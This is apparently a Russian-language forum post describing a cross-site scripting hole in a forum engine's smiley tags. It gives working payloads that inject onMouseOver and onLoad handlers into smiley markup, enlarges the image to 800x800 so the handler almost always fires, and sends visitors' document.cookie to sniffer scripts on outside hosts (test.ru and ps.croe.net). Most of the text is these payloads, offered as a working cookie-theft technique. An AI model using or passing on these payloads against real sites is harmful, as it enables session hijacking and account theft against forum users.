|
|
|
| Дабавил смайлик и отредактироввал его вот так:
Xss [:icon_fuc onMouseOver='alert(document.cookie)';:]
|
Добавил пост, навел курсор на смайлик и увидел свои кукисы...
Шанс, что посетитель наведет курсор на смайлик очень невелик, и тогда отредактировал его вот так:
Xss [:icon_fuc height=800 width=800 onMouseOver='alert(document.cookie)';:]
|
Теперь вероятность под сто процентов...
Осталось только здалать следующее:
XSS [:icon_con onMouseOver='window.open("http://test.ru/snif.php?"+document.cookie)';:]
|
Есть еще аозможность самая незаметная, но сработала она только на локальной машине:
XSS [:icon_con onLoad='window.open("http://test.ru/snif.php?"+document.cookie)';:]
|
Событие onLoad происходит только тогда, когда картинка (ну всмысле смайлик) загружена, а на локальной машине у меня картинки с адресими вида
<img align=middle src=../skins/base/smiles/icon_con onLoad='window.open("http://ps.croe.net/snif.php?"+document.cookie)';.gif />
Все равно отображались...
P.S.
О пять говорю я сильно сомневаюсь в своей правоте, хотя и убедился на опыте, что все работает... А сомневаюсь потому, что смайлики поддерживатся начиная с версии 2.1.1, а текущая версия 5+. И до сих пор никто не заметил... Странно. | |
|
|